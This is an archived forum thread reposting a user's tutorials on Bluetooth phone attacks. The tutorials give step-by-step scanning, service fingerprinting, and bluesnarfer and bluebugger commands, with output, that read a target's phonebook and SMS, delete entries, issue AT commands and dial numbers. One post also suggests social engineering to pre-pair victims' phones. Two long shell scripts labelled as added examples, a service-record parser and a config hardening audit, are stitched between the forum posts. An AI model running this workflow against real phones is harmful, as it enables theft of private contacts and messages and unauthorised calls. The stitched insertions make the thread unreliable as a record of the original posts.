
Thread: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

  1. #1
    Barry (My life is this forum) | Join Date: Jan 2010 | Posts: 3,817

    Dr_GrEeN's Bluetooth Guides From old forum.

    Okay, I dug this out of the Wayback Machine. This was a couple of posts by Dr_GrEeN on the old forum. We shouldn't lose this stuff.

    Quote Originally Posted by Dr_GrEen
    Part1
    Hey Guys

    Just thought I'd post a little on Bluetooth hacking because I can see there are a lot of questions and not a lot of answers, so here's how I hacked my Samsung D600.

    First I popped to my local supermarket and picked myself up a Bluetooth dongle for 6.99!!!! because my shitty Toshiba Satellite P100 doesn't have Bluetooth.

    OK, first let's configure BT.

    Type :

    bt ~ # mkdir -p /dev/bluetooth/rfcomm
    bt ~ # mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

    That's bluesnarfer done, now for bluebugger.

    Type:

    bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0

    OK, now we can fire up our Bluetooth adaptor, so type:

    bt ~ # hciconfig hci0 up

    Now our Bluetooth adaptor should be ready; check by typing:

    bt ~ # hciconfig hci0

    and you should see something like this:

    hci0: Type: USB
    BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
    UP RUNNING
    RX bytes:85 acl:0 sco:0 events:9 errors:0
    TX bytes:33 acl:0 sco:0 commands:9 errors:0

    OK, now we are ready to scan, so type:

    bt ~ # hcitool scan hci0

    And you should see all the devices in the area. You can also use btscanner, which has a brute-force scanner for discovering hidden devices.

    Now note the name and MAC of the target and let's move on.

    First thing, let's try to ping our target. Type:

    l2ping <target MAC>

    If you don't get a ping, GOOD LUCK.

    Next we need to find out a little about the device we want to hack, so let's fire up blueprint.

    And type:

    sdptool browse --tree --l2cap <target MAC>

    And you should get something like this:

    Code:
    Browsing 00:16:DB:A1:B6:B9 ...
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10000
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID128 : 0xdb1d8f12-95f3-402c-9b97-bc504c9a-55c4
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x1
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x6 - LanguageBaseAttributeIDList
      Data Sequence
        Code ISO639 (Integer) : 0x656e
        Encoding (Integer) : 0x6a
        Base Offset (Integer) : 0x100
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID128 : 0x1cdb1d8f-1295-f340-2c9b-97bc504c-9a55
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 57 42 54 45 58 54 00 00
    Attribute Identifier : 0x8003
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10001
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1101 - SerialPort
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x2
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1101 - SerialPort
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 53 65 72 69 61 6c 20 50 6f 72 74 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10002
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1103 - DialupNetworking (DUN)
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x3
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1103 - DialupNetworking (DUN)
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 44 69 61 6c 2d 75 70 20 4e 65 74 77 6f 72 6b 69 6e 67 00 00
    Attribute Identifier : 0x305
      Integer : 0x0
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10003
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1112 - HeadsetAudioGateway
        UUID16 : 0x1203 - GenericAudio
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x4
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1108 - Headset
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 56 6f 69 63 65 20 47 57 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10004
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x111f - HandsfreeAudioGateway
        UUID16 : 0x1203 - GenericAudio
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x5
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x111e - Handsfree
          Version (Integer) : 0x101
    Attribute Identifier : 0x100
      Data : 56 6f 69 63 65 20 47 57 00 00
    Attribute Identifier : 0x301
      Integer : 0x1
    Attribute Identifier : 0x311
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10005
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x110a - AudioSource
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
          Channel/Port (Integer) : 0x19
        Data Sequence
          UUID16 : 0x0019 - AVDTP
          Channel/Port (Integer) : 0x100
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x110d - AdvancedAudio
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 41 64 76 61 6e 63 65 64 20 61 75 64 69 6f 20 73 6f 75 72 63 65  00 00
    Attribute Identifier : 0x311
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10006
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x110c - RemoteControlTarget
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
          Channel/Port (Integer) : 0x17
        Data Sequence
          UUID16 : 0x0017 - AVCTP
          Channel/Port (Integer) : 0x100
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x110e - RemoteControl
          Version (Integer) : 0x100
    Attribute Identifier : 0x311
      Integer : 0x100
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10007
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1106 - OBEXFileTransfer
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x6
        Data Sequence
          UUID16 : 0x0008 - OBEX
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1106 - OBEXFileTransfer
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10008
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1105 - OBEXObjectPush
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x7
        Data Sequence
          UUID16 : 0x0008 - OBEX
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1105 - OBEXObjectPush
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 4f 62 6a 65 63 74 20 50 75 73 68 00 00
    Attribute Identifier : 0x303
      Data Sequence
        Integer : 0x1
        Integer : 0x3
        Integer : 0x5
        Integer : 0xff
    Now if you asked me what this means I wouldn't know, but I think it tells you a bit about the channels and what services are running on which channel.

    Anyway, after playing a bit I found that my D600 uses channel 7 for phonebook lookup etc. I think every make and model is different, so you might have to try a few until you get the right one. Like I said, I'm only just getting to grips with Linux, so if anybody knows any more I'd love to read about it.

    End Part 1
    Last edited by Barry; 03-27-2010 at 03:18 AM.
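The tree dump above maps each service record to the RFCOMM channel it listens on, which is the information the post says it could not read off. The following script is an added example, not code from the post: it parses that `sdptool browse --tree --l2cap` format with awk and prints one line per record (handle, service class, RFCOMM channel) so you can inventory what your own phone exposes and compare it with what you expect. The sample input is a constructed excerpt of the post's dump; the function and variable names are my own.

```shell
#!/bin/sh
# Added example (not from the post): turns the tree-style dump produced by
# `sdptool browse --tree --l2cap <bdaddr>` into a one-line-per-record inventory
#   <ServiceRecordHandle> <service class> <RFCOMM channel or ->
# Reads the dump on stdin; SAMPLE_SDP is a constructed excerpt of the post's output.

sdp_rfcomm_map() {
  awk '
    function hex2dec(h,   i, n) {
      h = tolower(h); sub(/^0x/, "", h); n = 0
      for (i = 1; i <= length(h); i++)
        n = n * 16 + index("0123456789abcdef", substr(h, i, 1)) - 1
      return n
    }
    # Print the record collected so far and reset for the next one.
    function emit() {
      if (handle != "")
        printf "%s %s %s\n", handle, (svc == "" ? "?" : svc), (chan == "" ? "-" : chan)
      handle = ""; svc = ""; chan = ""; inrf = 0
    }
    # Attribute 0x0 (ServiceRecordHandle) opens every record.
    /^ *Attribute Identifier : 0x0 - ServiceRecordHandle/ { emit(); section = "handle"; next }
    /^ *Attribute Identifier : 0x1 - ServiceClassIDList/ { section = "class"; next }
    /^ *Attribute Identifier : 0x4 - ProtocolDescriptorList/ { section = "proto"; next }
    /^ *Attribute Identifier/ { section = ""; next }
    section == "handle" && /Integer :/ { handle = $NF; next }
    # The first UUID in the class list names the service; a UUID128 entry
    # carries no name, so the raw UUID is kept instead.
    section == "class" && /UUID/ && svc == "" {
      i = index($0, " - "); svc = (i ? substr($0, i + 3) : $NF); gsub(/ /, "_", svc); next
    }
    # Only a Channel/Port that follows the RFCOMM UUID is an RFCOMM channel;
    # one that follows L2CAP (e.g. 0x19 for AVDTP) is a PSM and is skipped.
    section == "proto" && /UUID/ { inrf = ($0 ~ /- RFCOMM/); next }
    section == "proto" && inrf && /Channel\/Port/ { chan = hex2dec($NF); inrf = 0 }
    END { emit() }
  '
}

# Constructed excerpt of the dump shown in the post (three of its records).
SAMPLE_SDP='Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10001
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1101 - SerialPort
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x2

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10005
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x110a - AudioSource
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
      Channel/Port (Integer) : 0x19
    Data Sequence
      UUID16 : 0x0019 - AVDTP
      Channel/Port (Integer) : 0x100

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10008
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1105 - OBEXObjectPush
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x7'

printf '%s\n' "$SAMPLE_SDP" | sdp_rfcomm_map
```

The AudioSource record comes out with `-` because its Channel/Port values are L2CAP PSMs, not RFCOMM channels.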

  2. #2
    Barry (My life is this forum) | Join Date: Jan 2010 | Posts: 3,817

    Re: Dr_GrEeN's Bluetooth Guides From old forum.

    Here's part 2 of his post.

    Quote Originally Posted by Dr_GrEeN

    Part 2

    OK, let's get to it. Start a shell and let's take a look at bluesnarfer's options, so type:

    bt ~ # bluesnarfer

    And you should get:
    Code:
    bluesnarfer, version 0.1 -
    usage: bluesnarfer [options] [ATCMD] -b bt_addr
    
    ATCMD     : valid AT+CMD (GSM EXTENSION)
    
    TYPE      : valid phonebook type ..
    example   : "DC" (dialed call list)
                "SM" (SIM phonebook)
                "RC" (recevied call list)
                "XX" much more
    
    -b bdaddr : bluetooth device address
    -C chan   : bluetooth rfcomm channel
    
    -c ATCMD  : custom action
    -r N-M    : read phonebook entry N to M
    -w N-M    : delete phonebook entry N to M
    -f name   : search "name" in phonebook address
    -s TYPE   : select phonebook memory storage
    -l        : list aviable phonebook memory storage
    -i        : device info
    OK, so now we have some options. Let's begin; type:

    bluesnarfer [options] -C 7 -b <target MAC>

    for eg: bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55

    And the hack should start.

    Now bluebugger. Type:

    bluebugger -h

    And you should get:
    Code:
    bluebugger 0.1 (cant post urls :D)
    -----------------------------------------
    
    Usage: bluebugger [OPTIONS] -a <addr> [MODE]
    
           -a <addr>     = Bluetooth address of target
    
           Options:
           --------
           -m <name>     = Name to use when connecting (default: '')
           -d <device>   = Device to use (default: '/dev/rfcomm')
           -c <channel>  = Channelto use (default: 17)
           -n            = No device name lookup
           -t <timeout>  = Timeout in seconds for name lookup (default: 5)
           -o <file>     = Write output to <file>
    
           Mode:
           -----
           info                   = Read Phone Info   (default)
           phonebook              = Read Phonebook    (default)
           messages               = Read SMS Messages (default)
           dial <num>             = Dial number
           ATCMD                  = Custom Command (e.g. '+GMI')
    
           Note: Modes can be combined, e.g. 'info phonebook +GMI'
    Again, now we have our options, let's hack. Type:

    bluebugger [OPTIONS] -c 7 -a <target MAC> [MODE]

    for eg: bluebugger -m Dr_GrEeN -c 7 -a 00:11:22:33:44:55 dial 0845GAYPORN

    And again you should see some results.

    The only downside to hacking into my D600 is that you still have to allow it on the phone, so it's not exactly HACKING the D600, but it's a good training session. And now you can go forth and play.

    Hope you lot can understand my bad spelling etc. and have fun.

    PS: Can somebody swap these posts around? Sorry, my fault. And oh yeah, an RFCOMM Connection refused error is normally the wrong channel. If after using bluebugger you get an operation already in progress error, type:

    hciconfig hci0 down
    hciconfig hci0 reset
    hciconfig hci0 up

    And all should be well.
    Last edited by Barry; 03-27-2010 at 03:18 AM.

  3. #3
    Barry (My life is this forum) | Join Date: Jan 2010 | Posts: 3,817

    Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

    The "One Bluetooth post to rule them all!!" post.

    Quote Originally Posted by Dr_GrEen
    Backtrack Ultimate Bluetooth Tutorial

    Hey all

    After I received lots of mail and requests I decided to shed some more light on bluetooth. In this tutorial I am going to be covering the following subjects...

    1) Setting up your bluetooth equipment
    2) Scanning and fingerprinting devices
    3) Connectivity and RFCOMM
    4) Bluebugging & Bluesnarfing

    And as a merry Christmas to all at remote exploits

    5) Making bluetooth sniffing hardware for $39.99

    Video tutorials on different subjects will be added to this post over the next week.

    OK, let's begin. The first subject might sound silly to most here, but for the guys that just don't know I'm going to cover it anyway. To set up your Bluetooth USB device simply plug it in and wait for 10 seconds. Then type in the console:

    Code:
    hciconfig hci0 up
    And you should have your adapter up and working; you can test with the following command:


    Code:
    hciconfig -a
    And you should see something like the following.


    Code:
    hci0:   Type: USB
            BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
            UP RUNNING
            RX bytes:85 acl:0 sco:0 events:9 errors:0
            TX bytes:33 acl:0 sco:0 commands:9 errors:0
            Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
            Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
            Link policy:
            Link mode: SLAVE ACCEPT
            Name: 'ISSCBTA'
            Class: 0x000000
            Service Classes: Unspecified
            Device Class: Miscellaneous,
            HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
            Manufacturer: Integrated System Solution Corp. (57)
    OK, if you are stuck at this point I would suggest you go out and buy a USB dongle that is compatible with BackTrack. But if you are still with me, let's move on.

    Next is fingerprinting a Bluetooth device. Fingerprinting is the term we use for profiling a device, and to do this BackTrack has a collection of tools called BlueZ. BlueZ is basically the standard Bluetooth package for Linux. For fingerprinting we can use a couple of those tools. One is hcitool; we can use hcitool to scan for devices that are broadcasting. We scan with hcitool with the following command:

    Code:
    hcitool scan hci0
    And you should see something like:


    Code:
    Scanning ...
            00:11:22:33:44:55       hackme
    You can also brute-force scan for devices; BackTrack also has you covered on this with a wonderful tool called btscanner. btscanner can also do an inquiry scan; you would use btscanner in inquiry scan mode if you were wardriving.

    The other is sdptool; sdptool will browse our device for open channels and tell us what services are available on which channels.

    We fingerprint devices with sdptool by issuing the following command:


    Code:
    sdptool browse victim_Mac
    And you should see something like this:


    Code:
    Service Name: Serial Port
    Service RecHandle: 0x10001
    Service Class ID List:
      "Serial Port" (0x1101)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 2
    Profile Descriptor List:
      "Serial Port" (0x1101)
        Version: 0x0100
    
    Service Name: Dial-up Networking 
    Service RecHandle: 0x10002
    Service Class ID List:
      "Dialup Networking" (0x1103)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 3
    Profile Descriptor List:
      "Dialup Networking" (0x1103)
        Version: 0x0100
    
    Service Name: OBEX File Transfer 
    Service RecHandle: 0x10007
    Service Class ID List:
      "OBEX File Transfer" (0x1106)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 6
      "OBEX" (0x0008)
    Profile Descriptor List:
      "OBEX File Transfer" (0x1106)
        Version: 0x0100
    
    Service Name: Object Push 
    Service RecHandle: 0x10008
    Service Class ID List:
      "OBEX Object Push" (0x1105)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 7
      "OBEX" (0x0008)
    Profile Descriptor List:
      "OBEX Object Push" (0x1105)
        Version: 0x0100
    Let's take a look at what we have: on 2 we have a serial port/channel, on 3 we have dial-up, on 6 we have OBEX FTP and on 7 we have OPUSH.

    All are interesting, and now we have a pretty good idea about what the device is and so on.

    Now on to the bit most people I speak to struggle with: the dreaded RFCOMM :O. RFCOMM is a simple set of transport protocols, made on top of the L2CAP protocol, providing an emulated RS-232 serial port; or in layman's terms, they provide the language your device and laptop need to talk to each other.

    Now the first thing to do is to set up our Bluetooth configuration, so let's go over to the /etc dir and get stuck in.

    Open /etc/bluetooth/hcid.conf and replace the lot with this:

    Code:
    #
    # HCI daemon configuration file.
    #
    
    # HCId options
    options {
        # Automatically initialize new devices
        autoinit yes;
    
        # Security Manager mode
        #   none - Security manager disabled
        #   auto - Use local PIN for incoming connections
        #   user - Always ask user for a PIN
        #
        security auto;
    
        # Pairing mode
        #   none  - Pairing disabled
        #   multi - Allow pairing with already paired devices
        #   once  - Pair once and deny successive attempts
        pairing multi;
    
        # Default PIN code for incoming connections
        passkey "1234";
    }
    
    # Default settings for HCI devices
    device {
        # Local device name
        #   %d - device id
        #   %h - host name
        name "device1";
    
        # Local device class
        class 0x000000;
    
        # Default packet type
        #pkt_type DH1,DM1,HV1;
    
        # Inquiry and Page scan
        iscan enable; pscan enable;
    
        # Default link mode
        #   none   - no specific policy
        #   accept - always accept incoming connections
        #   master - become master on incoming connections,
        #            deny role switch on outgoing connections
        lm accept,master;
    
        # Default link policy
        #   none    - no specific policy
        #   rswitch - allow role switch
        #   hold    - allow hold mode
        #   sniff   - allow sniff mode
        #   park    - allow park mode
        lp rswitch,hold,sniff,park;
        auth enable;
        encrypt enable;
    }
    You can set up your own passkey and name. Also go over to a shell and type:


    Code:
    hciconfig -a
    And copy the class to hcid.conf, save and exit. You could set up rfcomm here too, but it's a live CD.

    Now restart your Bluetooth device like so:

    Code:
    bash /etc/rc.d/rc.bluetooth restart
    And now we can set up our rfcomm binds. I will post a bash script when I have time, but for now you will have to do it the manual way.

    First thing is to set up our devices:


    Code:
    mknod -m 666 /dev/rfcomm0 c 216 3
    mknod -m 666 /dev/rfcomm1 c 216 6
    mknod -m 666 /dev/rfcomm2 c 216 7
    OK, what we did there is create three binds to our Bluetooth device. The first one is rfcomm0 and is on channel 3, DUN dial-up; the second is rfcomm1 and is on channel 6, FTP; and the third is rfcomm2 and is on channel 7, OBEX push.

    Now let's connect it all up with sdptool.

    Code:
    sdptool add --channel=3 DUN
    sdptool add --channel=6 FTP
    sdptool add --channel=7 OPUSH
    Now we have set up our Bluetooth dongle correctly, we can begin hacking.
    End part 1
    Last edited by Barry; 03-27-2010 at 03:30 AM.
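The hcid.conf above pairs with `security auto`, a fixed `passkey "1234"`, `pairing multi` and `iscan enable`, which together mean any peer that knows the default PIN is accepted without a prompt and the adapter stays discoverable. As an added example (not from the post), this script audits a hcid.conf for those settings and rewrites them to the stricter values the file's own comments list; it assumes a laptop that does not need to be discoverable, that `iscan disable` is the counterpart of `iscan enable`, and the sample config and PIN are constructed.

```shell
#!/bin/sh
# Added example (not from the post): audits the hcid.conf the post installs for
# the options that weaken pairing, and rewrites them. The keywords and the
# security/pairing values are the ones listed in the comments of the post's file;
# "iscan disable" is assumed to be the counterpart of "iscan enable". Both
# functions read the config on stdin. SAMPLE_HCID is a constructed excerpt.

SAMPLE_HCID='options {
    autoinit yes;
    security auto;
    pairing multi;
    passkey "1234";
}
device {
    name "device1";
    iscan enable; pscan enable;
    lm accept,master;
    auth enable;
    encrypt enable;
}'

# Normalise: strip comments, one statement per line, trim blanks.
hcid_statements() {
  sed 's/#.*//' | tr ';' '\n' | sed 's/^[[:space:]]*//; s/[[:space:]]*$//; /^$/d'
}

has_stmt() { printf '%s\n' "$HCID_ST" | grep -qx "$1"; }

# Prints one "WEAK: ..." line per risky setting, nothing when the file is clean.
audit_hcid_conf() {
  HCID_ST=$(hcid_statements)
  if has_stmt 'security auto'; then
    echo 'WEAK: security auto - the local PIN answers incoming pairings without asking (use: security user)'
  fi
  if has_stmt 'pairing multi'; then
    echo 'WEAK: pairing multi - already paired peers may pair again (use: pairing once)'
  fi
  if has_stmt 'iscan enable'; then
    echo 'WEAK: iscan enable - adapter answers inquiries, i.e. it shows up in hcitool scan'
  fi
  pin=$(printf '%s\n' "$HCID_ST" | sed -n 's/^passkey "\(.*\)"$/\1/p')
  case "$pin" in
    ''|0000|1111|1234|123456) echo "WEAK: passkey \"$pin\" - empty or well-known default PIN" ;;
    *) if [ "${#pin}" -lt 8 ]; then echo "WEAK: passkey \"$pin\" - shorter than 8 characters"; fi ;;
  esac
  if ! has_stmt 'auth enable'; then echo 'WEAK: auth enable missing - links are not authenticated'; fi
  if ! has_stmt 'encrypt enable'; then echo 'WEAK: encrypt enable missing - links are not encrypted'; fi
}

# Rewrites the weak settings and installs the PIN given as $1; assumes a laptop
# that does not need to be discoverable (pairing can still be started from it).
harden_hcid_conf() {
  sed -e 's/security auto;/security user;/' \
      -e 's/pairing multi;/pairing once;/' \
      -e 's/iscan enable;/iscan disable;/' \
      -e "s/passkey \"[^\"]*\";/passkey \"$1\";/"
}

printf '%s\n' "$SAMPLE_HCID" | audit_hcid_conf
# Re-audit the hardened file; 48213957 is a constructed PIN, pick your own.
printf '%s\n' "$SAMPLE_HCID" | harden_hcid_conf 48213957 | audit_hcid_conf
```

On the post's file the first audit reports four weak settings and the re-audit of the hardened output reports none.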

  4. #4
    Barry (My life is this forum) | Join Date: Jan 2010 | Posts: 3,817

    Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

    The "One bluetooth post to rule them all!!" post, part 2.
    Quote Originally Posted by Dr_GrEeN
    If I were to talk you through every possible exploit there is for Bluetooth it would take all next year and I still wouldn't be finished, so the two hacks are going to be bluesnarfer and bluebugger.

    Bluesnarfer connects to a target Bluetooth device via Bluetooth's OBEX Push profile. But instead of pushing a business card, it pulls, using a "get" request for files with known names, such as the phonebook file (telecom/pb.vcf) or the calendar file (telecom/cal.vcs). Bluebugger works in a similar way.
    Also bear in mind that these security flaws can still be used against you. With a little bit of social engineering you could pre-pair a phone to your laptop and exploit it from then onwards. Stand by for a video of bluesnarfer and bluebugger successfully completing a hack on my Samsung D600.

    Both are pretty straightforward to use now you have your Bluetooth set up correctly. I'm not going to post commands because there is a video on the way. First bluebugger:

    Code:
    bluebugger 0.1 ( MaJoMu | back to basics. )
    -----------------------------------------
    
    Usage: bluebugger [OPTIONS] -a <addr> [MODE] 
    
           -a <addr>     =  Bluetooth address of target
    
           Options: 
           --------
           -m <name>     = Name to use when connecting (default: '')
           -d <device>   = Device to use (default: '/dev/rfcomm')
           -c <channel>  = Channelto use (default: 17)
           -n            = No device name lookup
           -t <timeout>  = Timeout in seconds for name lookup  (default: 5)
           -o <file>     = Write output to <file>
    
           Mode: 
           -----
           info                   = Read Phone Info   (default)
           phonebook              = Read Phonebook    (default)
           messages               = Read SMS Messages (default)
           dial <num>             = Dial number
           ATCMD                  = Custom Command (e.g. '+GMI')
    
           Note: Modes can be combined, e.g. 'info phonebook +GMI'
    And bluesnarfer:


    Code:
    bluesnarfer, version 0.1 -
    usage: bluesnarfer [options] [ATCMD] -b bt_addr
    
    ATCMD     : valid AT+CMD (GSM EXTENSION) 
    
    TYPE      : valid phonebook type .. 
    example   : "DC" (dialed call list)
                "SM" (SIM phonebook)
                "RC" (recevied call list)
                "XX" much more
    
    -b bdaddr :  bluetooth device address
    -C chan   : bluetooth rfcomm channel
    
    -c ATCMD  : custom action 
    -r N-M    : read phonebook entry N to M
    -w N-M    : delete phonebook entry N to M
    -f name   : search "name" in phonebook address
    -s TYPE   : select phonebook memory storage
    -l        : list aviable phonebook memory storage
    -i        : device info
    Now for the finale: how to turn an ordinary USB Bluetooth dongle into a $1000 sniffing tool.

  5. #5
    Archangel-Amael (Super Moderator) | Join Date: Jan 2010 | Location: Somewhere | Posts: 8,012

    Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

    Thanks Barry.

  6. #6
    Barry (My life is this forum) | Join Date: Jan 2010 | Posts: 3,817

    Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

    No problem. I don't think he's registered here now. Most of the how-tos were written for BT2 and BT3, but for the most part they work with BT4. Does anybody have the old forum on disk anywhere?

  7. #7
    muts (Developer) | Join Date: Jan 2006 | Posts: 272

    Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

    Old forums temporarily back online and planned to be dumped here in an "archive" forum... 2-3 days I hope.

  8. #8
    TAPE (Very good friend of the forum) | Join Date: Jan 2010 | Location: Europe | Posts: 599

    Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

    That's good news; there is a lot of good stuff there that really shouldn't be lost.

  9. #9
    Barry (My life is this forum) | Join Date: Jan 2010 | Posts: 3,817

    Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

    Quote Originally Posted by muts
    Old forums temporarily back online and planned to be dumped here in an "archive" forum... 2-3 days I hope.
    Sweet! Good to know, thanks Muts!

  10. #10
    drgr33n (Very good friend of the forum) | Join Date: Jan 2010 | Location: Dark side of the moon ... | Posts: 699

    Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old forum.

    Hey guys,

    Just to let you know I'm still about, lurking in the background. Hope you guys are all well?
